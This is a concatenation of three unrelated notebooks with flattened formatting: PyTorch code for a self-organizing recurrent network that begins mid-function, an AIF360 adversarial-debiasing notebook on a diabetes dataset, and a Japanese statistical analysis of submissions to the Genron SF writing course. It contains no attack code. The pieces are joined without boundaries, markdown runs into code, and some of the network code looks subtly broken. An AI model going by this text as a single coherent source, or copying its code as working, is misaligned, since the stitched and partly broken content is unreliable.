prune_small_weights(te_update,self.te_min) # Set all te > 1.0 --> 1.0 # te_update = set_max_cutoff_weight(te_update,self.te_max) return te_update def ss(self, wee_t): """Synaptic Scaling or Synaptic Normalization""" wee_t = torch.div(wee_t, torch.sum(wee_t,dim=0)).cuda() return wee_t def istdp(self, wei, x, y, cutoff_weights): # Apply iSTDP rule : Regulates synaptic strength between the pre(Yj) and post(Xi) synaptic neurons xt_1 = x[:, 0].unsqueeze(1) xt = x[:, 1].unsqueeze(1) yt_1 = y[:, 0].unsqueeze(1) yt = y[:, 1].unsqueeze(1) # iSTDP applies only on the neurons which are connected. wei_t = wei.clone() for i in range(len(wei_t[0])): # Each neuron i, Post-synaptic neuron: means for each column; for j in range(len(wei_t[0:])): # Incoming connection from j, pre-synaptic neuron to ith neuron if wei_t[j][i] != 0. 
: # Check connectivity # Get the change in weight delta_wei_t = - self.eta_inhib * yt_1[j] * (1 - xt[i]*(1 + 1/self.mu_ip)) # Update the weight between jth neuron to i ""Different from notation in article wei_t[j][i] = wei[j][i] + delta_wei_t """ Prune the smallest weights induced by plasticity mechanisms; Apply lower cutoff weight""" wei_t = prune_small_weights(wei_t,cutoff_weights[0]) """Check and set all weights < upper cutoff weight """ wei_t = set_max_cutoff_weight(wei_t,cutoff_weights[1]) return wei_t @staticmethod def structural_plasticity(wee): """ Add new connection value to the smallest weight between excitatory units randomly""" p_c = torch.randint(0, 10, 1).cuda() if p_c == 0: # p_c= 0.1 """ Do structural plasticity """ # Choose the smallest weights randomly from the weight matrix wee indexes = get_unconnected_indexes(wee).cuda() # Choose any idx randomly idx_rand = random.choice(indexes) if idx_rand[0] == idx_rand[1]: idx_rand = random.choice(indexes) wee[idx_rand[0]][idx_rand[1]] = 0.001 return wee ########################################################### @staticmethod def initialize_plasticity(): wee = wee_init wei = wei_init wie = wie_init te = te_init ti = ti_init x = x_init y = y_init return wee, wei, wie, te, ti, x, y @staticmethod def reorganize_network(): passMATRIX COLLECTION: Child of class SORN : All other classes store and retrieve the arrays during simulation using this class ; Literally the Memory of SORNNo need to change any steps here: Performs storage and retrieval of arrays; Use CPUs; Higher the memory of CPU, longer single simulation step can be!class MatrixCollection(Sorn): def __init__(self,phase, matrices = None): super().__init__() self.phase = phase self.matrices = matrices if self.phase == 'Plasticity' and self.matrices == None : self.time_steps = Sorn.time_steps + 1 # Total training steps self.Wee, self.Wei, self.Wie, self.Te, self.Ti, self.X, self.Y = [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps wee, wei, wie, te, ti, x, y = Plasticity.initialize_plasticity() # Assign initial matrix to the master matrices self.Wee[0] = wee self.Wei[0] = wei self.Wie[0] = wie self.Te[0] = te self.Ti[0] = ti self.X[0] = x self.Y[0] = y elif self.phase == 'Plasticity' and self.matrices != None: self.time_steps = Sorn.time_steps + 1 # Total training steps self.Wee, self.Wei, self.Wie, self.Te, self.Ti, self.X, self.Y = [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps # Assign matrices from plasticity phase to the new master matrices for training phase self.Wee[0] = matrices['Wee'] self.Wei[0] = matrices['Wei'] self.Wie[0] = matrices['Wie'] self.Te[0] = matrices['Te'] self.Ti[0] = matrices['Ti'] self.X[0] = matrices['X'] self.Y[0] = matrices['Y'] elif self.phase == 'Training': """NOTE: time_steps here is diferent for plasticity or trianing phase""" self.time_steps = Sorn.time_steps + 1 # Total training steps self.Wee, self.Wei, self.Wie, self.Te, self.Ti, self.X, self.Y = [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps, [0] * self.time_steps, \ [0] * self.time_steps # Assign matrices from plasticity phase to new respective matrices for training phase self.Wee[0] = matrices['Wee'] self.Wei[0] = matrices['Wei'] self.Wie[0] = matrices['Wie'] self.Te[0] = matrices['Te'] 
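# thresholds and activity vectors carried over from the earlier run seed index 0 as well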
self.Ti[0] = matrices['Ti'] self.X[0] = matrices['X'] self.Y[0] = matrices['Y'] # @staticmethod def weight_matrix(self, wee, wei, wie, i): # Get delta_weight from Plasticity.stdp # i - training step self.Wee[i + 1] = wee self.Wei[i + 1] = wei self.Wie[i + 1] = wie return self.Wee, self.Wei, self.Wie # @staticmethod def threshold_matrix(self, te, ti, i): self.Te[i + 1] = te self.Ti[i + 1] = ti return self.Te, self.Ti # @staticmethod def network_activity_t(self, excitatory_net, inhibitory_net, i): self.X[i + 1] = excitatory_net self.Y[i + 1] = inhibitory_net return self.X, self.Y # @staticmethod def network_activity_t_1(self, x, y, i): x_1, y_1 = [0] * self.time_steps, [0] * self.time_steps x_1[i] = x y_1[i] = y return x_1, y_1NETWORK STATE: Class which measure the evolution of network state with and without external stimuli. Also reveals recurrent activity in the network. Compute using GPU!class NetworkState(Plasticity): """The evolution of network states""" def __init__(self, v_t): super().__init__() self.v_t = v_t def incoming_drive(self,weights,activity_vector): # Broadcasting weight*acivity vectors if weights.shape[0] == weights.shape[1]: incoming = torch.mm(weights.cuda(), activity_vector.cuda()) else: incoming = torch.mm(weights.t().cuda(), activity_vector.cuda()) incoming = incoming.sum(dim=0).cuda() return incoming def excitatory_network_state(self, wee, wei, te, x, y,white_noise_e): """ Activity of Excitatory neurons in the network""" xt = x[:, 1].unsqueeze(1) yt = y[:, 1].unsqueeze(1) incoming_drive_e = self.incoming_drive(weights = wee,activity_vector=xt).cuda() incoming_drive_i = self.incoming_drive(weights = wei,activity_vector=yt).cuda() # tot_incoming_drive = incoming_drive_e.add_(torch.randn(incoming_drive_e.size()) * 0.04) - incoming_drive_i - te tot_incoming_drive = incoming_drive_e - incoming_drive_i - te.cuda() """Heaviside step function""" heaviside_step = torch.zeros(len(tot_incoming_drive)) for t in range(len(tot_incoming_drive)): heaviside_step[t] = torch.Tensor([0.0]).cuda() if tot_incoming_drive[t].cuda() < te[t].cuda() else torch.Tensor([1.0]).cuda() xt_next = heaviside_step.unsqueeze(1).cuda() return xt_next def inhibitory_network_state(self, wie, ti, x,white_noise_i): # Activity of inhibitory neurons xt = x[:, 1].unsqueeze(1) incoming_drive_i = self.incoming_drive(weights = wie,activity_vector=xt).cuda() # tot_incoming_drive = incoming_drive_i.add_(torch.randn(incoming_drive_e.size()) * 0.04) - ti tot_incoming_drive = incoming_drive_i - ti.cuda() """Implement Heaviside step function""" heaviside_step = torch.zeros(len(tot_incoming_drive)) for t in range(len(tot_incoming_drive)): heaviside_step[t] = torch.Tensor([0.0]).cuda() if tot_incoming_drive[t].cuda() < ti[t].cuda() else torch.Tensor([1.0]).cuda() yt_next = heaviside_step.unsqueeze(1).cuda() return yt_next def recurrent_drive(self, wee, wei, te, x, y,white_noise_e): """Network state due to recurrent drive received by the each unit at time t+1""" xt = x[:, 1].unsqueeze(1) yt = y[:, 1].unsqueeze(1) incoming_drive_e = self.incoming_drive(weights = wee,activity_vector=xt).cuda() incoming_drive_i = self.incoming_drive(weights = wei,activity_vector=yt).cuda() # tot_incoming_drive = incoming_drive_e.add_(torch.randn(incoming_drive_e.size()) * 0.04) - incoming_drive_i - te tot_incoming_drive = incoming_drive_e - incoming_drive_i - te.cuda() """Heaviside step function""" heaviside_step = torch.zeros(len(tot_incoming_drive)).cuda() for t in range(len(tot_incoming_drive)): heaviside_step[t] = 
torch.Tensor([0.0]).cuda() if tot_incoming_drive[t].cuda() < te[t].cuda() else torch.Tensor([1.0]).cuda() xt_next = heaviside_step.unsqueeze(1).cuda() return xt_next class RunSorn(Sorn): def __init__(self,phase,matrices,time_steps): super().__init__() self.time_steps = time_steps Sorn.time_steps = time_steps self.phase = phase self.matrices = matrices def run_sorn(self, inp): # Initialize/Get the weight, threshold matrices and activity vectors matrix_collection = MatrixCollection(phase = self.phase,matrices = self.matrices) # Collect the network activity at all time steps x_all = [] Y_all = [] R_all = [] frac_pos_active_conn = [] # To get the last activation status of Exc and Inh neurons for i in tqdm.tqdm(range(self.time_steps)): # """ Generate white noise""" # white_noise_e = white_gaussian_noise(mu= 0., sigma = 0.04,t = Sorn.ne) # white_noise_i = white_gaussian_noise(mu= 0., sigma = 0.04,t = Sorn.ni) network_state = NetworkState(inp) # Feed input and initialize network state # Buffers to get the resulting x and y vectors at the current time step and update the master matrix x_buffer, y_buffer = torch.zeros(( Sorn.ne, 2)), torch.zeros((Sorn.ni, 2)).cuda() te_buffer, ti_buffer = torch.zeros((Sorn.ne, 1)), torch.zeros((Sorn.ni, 1)).cuda() # Get the matrices and rename them for ease of reading Wee, Wei, Wie = matrix_collection.Wee, matrix_collection.Wei, matrix_collection.Wie Te, Ti = matrix_collection.Te, matrix_collection.Ti X, Y = matrix_collection.X, matrix_collection.Y # Recurrent drive at t+1 used to predict the next external stimuli r = network_state.recurrent_drive(Wee[i], Wei[i], Te[i], X[i], Y[i],white_noise_e=0.).cuda() """ Fraction of active connections between E-E network""" frac_pos_active_conn.append((Wee[i] > 0.0).sum()) """Get excitatory states and inhibitory states given the weights and thresholds""" # x(t+1), y(t+1) excitatory_state_xt_buffer = network_state.excitatory_network_state(Wee[i], Wei[i], Te[i], X[i], Y[i],white_noise_e=0.).cuda() inhibitory_state_yt_buffer = network_state.inhibitory_network_state(Wie[i], Ti[i], X[i],white_noise_i=0.) 
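# The two network-state calls above implement the SORN threshold dynamics: each excitatory unit
# sums its excitatory drive (Wee·x) minus its inhibitory drive (Wei·y) minus its threshold Te,
# and each inhibitory unit sums its drive from the excitatory pool (Wie·x) minus Ti; a
# Heaviside-style threshold inside NetworkState then maps the summed drive to a binary 0/1 state
# for time t+1. The buffer assignments below shift the current state into the t-1 slot and store
# the freshly computed state in the t slot.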
""" Update X and Y """ x_buffer[:, 0] = X[i][:, 1] # xt -->(becomes) xt_1 x_buffer[:, 1] = excitatory_state_xt_buffer.squeeze() # New_activation; x_buffer --> xt y_buffer[:, 0] = Y[i][:, 1] y_buffer[:, 1] = inhibitory_state_yt_buffer.squeeze() """Plasticity phase""" plasticity = Plasticity() # STDP Wee_t = plasticity.stdp(Wee[i],x_buffer,cutoff_weights = (0.0,1.0)).cuda() # Intrinsic plasticity Te_t = plasticity.ip(Te[i],x_buffer) # Structural plasticity # Wee_t = plasticity.structural_plasticity(Wee_t) # iSTDP # Wei_t = plasticity.istdp(Wei[i],x_buffer,y_buffer,cutoff_weights = (0.0,1.0)) # Synaptic scaling Wee Wee_t = Plasticity().ss(Wee_t) # Synaptic scaling Wei # Wei_t = Plasticity().ss(Wei_t) """Assign the matrices to the matrix collections""" matrix_collection.weight_matrix(Wee_t, Wei[i], Wie[i], i) matrix_collection.threshold_matrix(Te_t, Ti[i], i) matrix_collection.network_activity_t(x_buffer, y_buffer, i) x_all.append(x_buffer[:,1]) Y_all.append(y_buffer[:,1]) R_all.append(r) plastic_matrices = {'Wee':matrix_collection.Wee[-1], 'Wei': matrix_collection.Wei[-1], 'Wie':matrix_collection.Wie[-1], 'Te': matrix_collection.Te[-1], 'Ti': matrix_collection.Ti[-1], 'X': X[-1], 'Y': Y[-1]} return plastic_matrices,x_all,Y_all,R_all,frac_pos_active_conn plastic_matrices,X_all,Y_all,R_all,frac_pos_active_conn = RunSorn(phase = 'Plasticity',matrices = None,time_steps = 10).run_sorn(None)0%| | 0/10 [00:00This Notebook demonstrates how to reduce the bias during "Pre-processing" & "In-processing" stage using AI 360 Fairness toolkit Pre-processing algorithmA bias mitigation algorithm that is applied to training data. In-processing algorithmA bias mitigation algorithm that is applied to a model during its training. Insert your credentials as credentials in the below cellClick on dropdown from Pipeline_LabelEncoder-0.1.zip under Data tab and select 'Credentials'# @hidden_cell # The following code contains the credentials for a file in your IBM Cloud Object Storage. # You might want to remove those credentials before you share your notebook. 
credentials = { } from ibm_botocore.client import Config import ibm_boto3 cos = ibm_boto3.client(service_name='s3', ibm_api_key_id=credentials['IBM_API_KEY_ID'], ibm_service_instance_id=credentials['IAM_SERVICE_ID'], ibm_auth_endpoint=credentials['IBM_AUTH_ENDPOINT'], config=Config(signature_version='oauth'), endpoint_url=credentials['ENDPOINT']) import os os.getcwd() cos.download_file(Bucket=credentials['BUCKET'],Key='Pipeline_LabelEncoder-0.1.zip',Filename='/home/wsuser/work/Pipeline_LabelEncoder-0.1.zip') !ls !pip install Pipeline_LabelEncoder-0.1.zip !pip install aif360 !pip install 'tensorflow>=1.13.1,< 2' --force-reinstall import tensorflow as tf tf.__version__ %matplotlib inline # Load all necessary packages import pandas as pd from aif360.datasets import BinaryLabelDataset from aif360.metrics import BinaryLabelDatasetMetric from aif360.metrics import ClassificationMetric from aif360.metrics.utils import compute_boolean_conditioning_vector from aif360.algorithms.inprocessing.adversarial_debiasing import AdversarialDebiasing from sklearn.linear_model import LogisticRegression from sklearn.preprocessing import StandardScaler, MaxAbsScaler from sklearn.metrics import accuracy_score from IPython.display import Markdown, display import matplotlib.pyplot as plt df = pd.read_csv(body) df.head() df.describe(include = 'all') privileged_groups = [{'Age': 1}] unprivileged_groups = [{'Age': 0}] favorable_label = 0 unfavorable_label = 1 from sklearn import preprocessing categorical_column = ['Age'] data_encoded = df.copy(deep=True) #Use Scikit-learn label encoding to encode character data lab_enc = preprocessing.LabelEncoder() for col in categorical_column: data_encoded[col] = lab_enc.fit_transform(df[col]) le_name_mapping = dict(zip(lab_enc.classes_, lab_enc.transform(lab_enc.classes_))) print('Feature', col) print('mapping', le_name_mapping) data_encoded.head() from Pipeline_LabelEncoder.sklearn_label_encoder import PipelineLabelEncoder preprocessed_data = PipelineLabelEncoder(columns = ['Age']).fit_transform(data_encoded) print('-------------------------') #print('validation data encoding') #validation_enc_data = PipelineLabelEncoder(columns = ['Gender','Married', 'Fraud_risk']).transform(validation_input_data) #Create binary label dataset that can be used by bias mitigation algorithms diabetes_dataset = BinaryLabelDataset(favorable_label=favorable_label, unfavorable_label=unfavorable_label, df=preprocessed_data, label_names=['Outcome'], protected_attribute_names=['Age'], unprivileged_protected_attributes=unprivileged_groups) display(Markdown("#### Training Data Details")) print("shape of the training dataset", diabetes_dataset.features.shape) print("Training data favorable label", diabetes_dataset.favorable_label) print("Training data unfavorable label", diabetes_dataset.unfavorable_label) print("Training data protected attribute", diabetes_dataset.protected_attribute_names) print("Training data privileged protected attribute (1:Young and 0:Old)", diabetes_dataset.privileged_protected_attributes) print("Training data unprivileged protected attribute (1:Young and 0:Old)", diabetes_dataset.unprivileged_protected_attributes) diabetes_dataset_train, diabetes_dataset_test = diabetes_dataset.split([0.6], shuffle=True) # Metric for the original dataset metric_orig_train = BinaryLabelDatasetMetric(diabetes_dataset_train, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) display(Markdown("#### Original training dataset")) print("Train set: Difference in mean outcomes 
between unprivileged and privileged groups = %f" % metric_orig_train.mean_difference()) metric_orig_test = BinaryLabelDatasetMetric(diabetes_dataset_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_orig_test.mean_difference()) min_max_scaler = MaxAbsScaler() diabetes_dataset_train.features = min_max_scaler.fit_transform(diabetes_dataset_train.features) diabetes_dataset_test.features = min_max_scaler.transform(diabetes_dataset_test.features) metric_scaled_train = BinaryLabelDatasetMetric(diabetes_dataset_train, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) display(Markdown("#### Scaled dataset - Verify that the scaling does not affect the group label statistics")) print("Train set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_scaled_train.mean_difference()) metric_scaled_test = BinaryLabelDatasetMetric(diabetes_dataset_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_scaled_test.mean_difference())Build plan classifier without debiasing# Load post-processing algorithm that equalizes the odds # Learn parameters with debias set to False sess = tf.Session() #sess = tf.compat.v1.Session() plain_model = AdversarialDebiasing(privileged_groups = privileged_groups, unprivileged_groups = unprivileged_groups, scope_name='plain_classifier', debias=False, sess=sess) plain_model.fit(diabetes_dataset_train)WARNING:tensorflow:From /opt/conda/envs/Python-3.7-main/lib/python3.7/site-packages/aif360/algorithms/inprocessing/adversarial_debiasing.py:137: The name tf.variable_scope is deprecated. Please use tf.compat.v1.variable_scope instead. WARNING:tensorflow:From /opt/conda/envs/Python-3.7-main/lib/python3.7/site-packages/aif360/algorithms/inprocessing/adversarial_debiasing.py:141: The name tf.placeholder is deprecated. Please use tf.compat.v1.placeholder instead. WARNING:tensorflow:From /opt/conda/envs/Python-3.7-main/lib/python3.7/site-packages/aif360/algorithms/inprocessing/adversarial_debiasing.py:84: The name tf.get_variable is deprecated. Please use tf.compat.v1.get_variable instead. WARNING:tensorflow: The TensorFlow contrib module will not be included in TensorFlow 2.0. 
For more information, please see: * https://github.com/tensorflow/community/blob/master/rfcs/20180907-contrib-sunset.md * https://github.com/tensorflow/addons * https://github.com/tensorflow/io (for I/O rela[...]Apply the plain model to test datadataset_nodebiasing_train = plain_model.predict(diabetes_dataset_train) dataset_nodebiasing_test = plain_model.predict(diabetes_dataset_test)Metrics for the dataset from plain model (without debiasing)display(Markdown("#### Model - without debiasing - dataset metrics")) metric_dataset_nodebiasing_train = BinaryLabelDatasetMetric(dataset_nodebiasing_train, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Train set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_nodebiasing_train.mean_difference()) metric_dataset_nodebiasing_test = BinaryLabelDatasetMetric(dataset_nodebiasing_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_nodebiasing_test.mean_difference()) display(Markdown("#### Model - without debiasing - classification metrics")) classified_metric_nodebiasing_test = ClassificationMetric(diabetes_dataset_test, dataset_nodebiasing_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Classification accuracy = %f" % classified_metric_nodebiasing_test.accuracy()) TPR = classified_metric_nodebiasing_test.true_positive_rate() TNR = classified_metric_nodebiasing_test.true_negative_rate() bal_acc_nodebiasing_test = 0.5*(TPR+TNR) print("Test set: Balanced classification accuracy = %f" % bal_acc_nodebiasing_test) print("Test set: Disparate impact = %f" % classified_metric_nodebiasing_test.disparate_impact()) print("Test set: Equal opportunity difference = %f" % classified_metric_nodebiasing_test.equal_opportunity_difference()) print("Test set: Average odds difference = %f" % classified_metric_nodebiasing_test.average_odds_difference()) print("Test set: Theil_index = %f" % classified_metric_nodebiasing_test.theil_index())Apply in-processing algorithm based on adversarial learningsess.close() tf.reset_default_graph() sess = tf.Session() # Learn parameters with debias set to True debiased_model = AdversarialDebiasing(privileged_groups = privileged_groups, unprivileged_groups = unprivileged_groups, scope_name='debiased_classifier', debias=True, sess=sess) debiased_model.fit(diabetes_dataset_train)epoch 0; iter: 0; batch classifier loss: 0.719709; batch adversarial loss: 0.707410 epoch 1; iter: 0; batch classifier loss: 0.734156; batch adversarial loss: 0.704542 epoch 2; iter: 0; batch classifier loss: 0.726808; batch adversarial loss: 0.702275 epoch 3; iter: 0; batch classifier loss: 0.745609; batch adversarial loss: 0.701177 epoch 4; iter: 0; batch classifier loss: 0.731937; batch adversarial loss: 0.700088 epoch 5; iter: 0; batch classifier loss: 0.724922; batch adversarial loss: 0.698732 epoch 6; iter: 0; batch classifier loss: 0.713914; batch adversarial loss: 0.695718 epoch 7; iter: 0; batch classifier loss: 0.721002; batch adversarial loss: 0.695420 epoch 8; iter: 0; batch classifier loss: 0.706691; batch adversarial loss: 0.692693 epoch 9; iter: 0; batch classifier loss: 0.704806; batch adversarial loss: 0.690888 epoch 10; iter: 0; batch classifier loss: 0.713283; batch adversarial loss: 0.687029 epoch 11; iter: 0; batch classifier loss: 0.709272; batch adversarial loss:[...]Apply 
the plain model to test datadataset_debiasing_train = debiased_model.predict(diabetes_dataset_train) dataset_debiasing_test = debiased_model.predict(diabetes_dataset_test) # Metrics for the dataset from plain model (without debiasing) display(Markdown("#### Model - without debiasing - dataset metrics")) print("Train set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_nodebiasing_train.mean_difference()) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_nodebiasing_test.mean_difference()) # Metrics for the dataset from model with debiasing display(Markdown("#### Model - with debiasing - dataset metrics")) metric_dataset_debiasing_train = BinaryLabelDatasetMetric(dataset_debiasing_train, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Train set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_debiasing_train.mean_difference()) metric_dataset_debiasing_test = BinaryLabelDatasetMetric(dataset_debiasing_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_dataset_debiasing_test.mean_difference()) display(Markdown("#### Model - without debiasing - classification metrics")) print("Test set: Classification accuracy = %f" % classified_metric_nodebiasing_test.accuracy()) TPR = classified_metric_nodebiasing_test.true_positive_rate() TNR = classified_metric_nodebiasing_test.true_negative_rate() bal_acc_nodebiasing_test = 0.5*(TPR+TNR) print("Test set: Balanced classification accuracy = %f" % bal_acc_nodebiasing_test) print("Test set: Disparate impact = %f" % classified_metric_nodebiasing_test.disparate_impact()) print("Test set: Equal opportunity difference = %f" % classified_metric_nodebiasing_test.equal_opportunity_difference()) print("Test set: Average odds difference = %f" % classified_metric_nodebiasing_test.average_odds_difference()) print("Test set: Theil_index = %f" % classified_metric_nodebiasing_test.theil_index()) display(Markdown("#### Model - with debiasing - classification metrics")) classified_metric_debiasing_test = ClassificationMetric(diabetes_dataset_test, dataset_debiasing_test, unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups) print("Test set: Classification accuracy = %f" % classified_metric_debiasing_test.accuracy()) TPR = classified_metric_debiasing_test.true_positive_rate() TNR = classified_metric_debiasing_test.true_negative_rate() bal_acc_debiasing_test = 0.5*(TPR+TNR) print("Test set: Balanced classification accuracy = %f" % bal_acc_debiasing_test) print("Test set: Disparate impact = %f" % classified_metric_debiasing_test.disparate_impact()) print("Test set: Equal opportunity difference = %f" % classified_metric_debiasing_test.equal_opportunity_difference()) print("Test set: Average odds difference = %f" % classified_metric_debiasing_test.average_odds_difference()) print("Test set: Theil_index = %f" % classified_metric_debiasing_test.theil_index())データで見る ゲンロン 大森望 SF創作講座 2018 [ゲンロン 大森望 SF創作講座 第3期](http://school.genron.co.jp/works/sf/2018/) も残すところ最終課題のみとなった。 最終課題は「ゲンロンSF新人賞」と題されており他とは少し毛色が違うので、通常課題はすべて出揃ったことになる。 明日からは[第4期の募集も始まる](https://twitter.com/genronschool/status/1110500492763762688)とのことなので、受講を迷っている方に向けてSF創作講座第3期のデータを見てみようと思う。目次は次のとおりである。- 課題提出数の推移- 選出・得点の機会- 梗概の文字数- 受講生勝手にランキング 
データは、[fuji-nakahara/genron-sf-app](https://github.com/fuji-nakahara/genron-sf-app) を用いて [超・SF作家育成サイト](http://school.genron.co.jp/works/sf/) をスクレイピングしたものを用いる。import pandas as pd import seaborn as sns %config InlineBackend.figure_formats = {'png', 'retina'} sns.set() %config SqlMagic.autopandas = True %config SqlMagic.feedback = False %load_ext sql %sql postgresql://fuji-nakahara@localhost/genron-school-sf-app_development term_id = 2018 from datetime import datetime print(datetime.now())2019-03-29 01:39:09.829794課題提出数の推移 まずは、課題ごとに何編の梗概・実作が提出されているかをみてみよう。SF創作講座は1年の期間を通して月に1度のペースで開催される。 受講料は20万円と決して安くはないが、途中から課題を提出しなくなる受講生も意外と多い。 かくいう私自身も第8回の梗概を最後に、最終課題は提出できなさそうである。 提出数の推移から、そういった受講生がどのくらいるかがわかるだろう。%%sql subjects << select s.number , s.title , l.name as proposer , s.synopses_count , count(sy.id) as selected_synopses_count , s.works_count from subjects s left join lecturers l on (s.id = l.subject_id and ('課題提示' = any (l.roles))) left join synopses sy on (s.id = sy.subject_id and sy.selected = True) where s.term_id = :term_id and s.number <= 10 group by 1, 2, 3, 4, 6 order by 1 subjects上の表は、各課題の梗概提出数 (synopses_count) と実作提出数 (works_count) である。合わせて、選出された梗概の数 (selected_synopses_count) も出している。 梗概の選出は各課題原則3編とのことだったが、3期は4編選ばれることのほうが多かった。梗概と実作の提出数の推移をグラフにすると次のようになる。subjects.plot(x='number', y=['synopses_count', 'works_count'])梗概数は回を増すごとに単調に減少している。 第1回は43編が提出されていたが、第9・10回は約半数の22編である。 11月(第6回)に聴講生から受講生に変わった人が3名ほどいるため、実質半数を切っている。実作提出数は増えたり減ったりであるが、やはり序盤の方が少し多い。 ちなみに、梗概・実作の提出総数は次のとおりである。subjects[['synopses_count', 'works_count']].sum()選出・得点機会 脱落してしまう理由はいろいろあると思うが、一つに徹底した実力主義があるだろう。 提出した梗概は審査され、全提出作から3または4編だけが選出される。 そして、選出されたとしても、また次回に実作で点数を競うことになる。講義の時間は選出作品に多く割かれ、講師の評価が低ければほとんど言及されないことも珍しくない。 仮に競争を意識していなかったとしても、提出した作品が講義で取り上げられないことが続くとつらいものがある。この節では、そうした梗概の選出・実作の得点機会についてみる。%%sql student_synopses << select name , submitted_count , selected_count , coalesce(characters_sum / submitted_count::real, 0) as characters_ave , coalesce(max_character_count, 0) as max_character_count , coalesce(appeal_characters_sum / submitted_count::real, 0) as appeal_characters_ave , coalesce(max_appeal_character_count, 0) as max_appeal_character_count from ( select s.original_id , s.name , count(sy.id) as submitted_count , sum(case when sy.selected then 1 else 0 end) as selected_count , sum(sy.character_count) as characters_sum , max(sy.character_count) as max_character_count , sum(sy.appeal_character_count) as appeal_characters_sum , max(sy.appeal_character_count) as max_appeal_character_count from students s join students_terms st on s.id = st.student_id left join ( select sy.* from synopses sy join subjects su on ( sy.subject_id = su.id and su.term_id = :term_id ) ) sy on s.id = sy.student_id where st.term_id = :term_id group by 1, 2 ) student_synopses order by original_id %%sql student_works << select name , submitted_count , submitted_count - selected_count as optional_count , coalesce(score, 0) as score , optional_score , coalesce(characters_sum, 0) as characters_sum from ( select s.original_id , s.name , count(w.id) as submitted_count , sum(case when w.selected = True then 1 else 0 end) as selected_count , sum(w.score) as score , sum(case when w.selected != True then w.score else 0 end) as optional_score , sum(w.character_count) as characters_sum from students s join students_terms st on s.id = st.student_id left join ( select w.* , sy.selected from works w join subjects su on ( w.subject_id = su.id and su.term_id = :term_id ) left join synopses sy using (original_id) ) w on s.id = w.student_id where st.term_id = :term_id 
group by 1, 2 ) student_synopses order by original_id* postgresql://fuji-nakahara@localhost/genron-school-sf-app_development Returning data to local variable student_works梗概の提出・選出回数 受講生1人あたりの梗概提出回数・選出回数を調べてみよう。student_synopses[['submitted_count', 'selected_count']].describe()48人の受講生について、梗概提出回数 (submitted_count) の平均値は5.87回、中央値は6回である。 それに対し、選出回数 (selected_count) は平均0.69回、中央値に至っては0回であった。 つまり、半数以上の受講生が一度も選出されないのである。 分布にすると次のようになる。student_synopses[['submitted_count', 'selected_count']].plot.hist(bins=11, alpha=0.5)オレンジ色が選出回数の分布である。 1度も選出されていない受講生が32人おり、これは全体の32/48、すなわち3分の2である。 また、青色が提出回数の分布である。 これを見ると、10回、つまりすべての課題の梗概を提出した受講生が13人ほどいる。 実作提出数・自主提出数 同じように実作についてもみてみよう。基本的には、梗概を選出された受講生が次の回に実作を書くことになっている。 しかし、選出されていなくても実作を提出することは許されており、これは自主提出と呼ばれている。 自主提出の場合は、必ずしも点数がつくわけではない。student_works[['submitted_count', 'optional_count']].describe()実作提出回数の平均は1.92回、自主提出回数の平均は1.31回だった。 提出回数の分布は次のようになる。student_works.submitted_count.plot.hist(bins=10)48人中26人、すなわち半数以上は1度も実作を提出していない。 また、自主提出作品の総数は次のとおりである。student_works.optional_count.sum()得点した自主提出作品 自主提出にはどのくらいの点数がつくのか。 得点した自主提出作品はそれほど多くないので、すべてリストアップしてみよう。%%sql select su.number , su.title as subject_title , w.title as work_title , s.name as author , w.score from works w join students s on w.student_id = s.id join subjects su on ( w.subject_id = su.id and su.term_id = :term_id ) join synopses sy on (w.original_id = sy.original_id) where sy.selected != True and w.score > 0 order by 1, s.original_id* postgresql://fuji-nakahara@localhost/genron-school-sf-app_development自主提出63作中得点したのはたった14作である。 14/63 = 0.22 ということで、4分の1未満の自主提出作品にしか点数はつかない。 また、得点の最大値も5点となっている。 梗概の文字数 この節では、梗概の文字数についてみていく。SF創作講座の課題には、梗概1200字以下、アピール文400字以下というルールがある。 しかし、これはほとんど守られていない。 そして、守っていない作品も選出される。 むしろ、守っていない作品のほうが選出されやすいのではないか? 多くの受講生が疑問思っているであろうこの問いに答えてみたい。%%sql synopses_character_counts << select s.number , sy.title , st.name as author , sy.character_count , sy.appeal_character_count , sy.selected from subjects s join synopses sy on s.id = sy.subject_id join students st on sy.student_id = st.id where s.term_id = :term_id and s.number <= 9 order by 1 selected_synopses_character_counts = synopses_character_counts[synopses_character_counts.selected]各種文字数の統計量 全梗概の文字数、全梗概のアピール文文字数、選出梗概の文字数、選出梗概のアピール文文字数のそれぞれについて平均や分散などの統計量をみる。character_counts_with_selected = pd.DataFrame( { 'character_count': synopses_character_counts.character_count, 'selected_character_count': selected_synopses_character_counts.character_count, 'appeal_character_count': synopses_character_counts.appeal_character_count.fillna(0), 'selected_appeal_character_count': selected_synopses_character_counts.appeal_character_count.fillna(0) } ) character_counts_with_selected.describe()梗概の文字数 (character_count) の平均は1434字であるのに対し、選出梗概の文字数 (selected_character_count) の平均は1581字と約150字も多かった。 アピール文についても、329字に対し、341字と10字ほど多い。 もちろん、選出梗概のサンプル数が少なく、標準偏差も大きいため有意差はない。 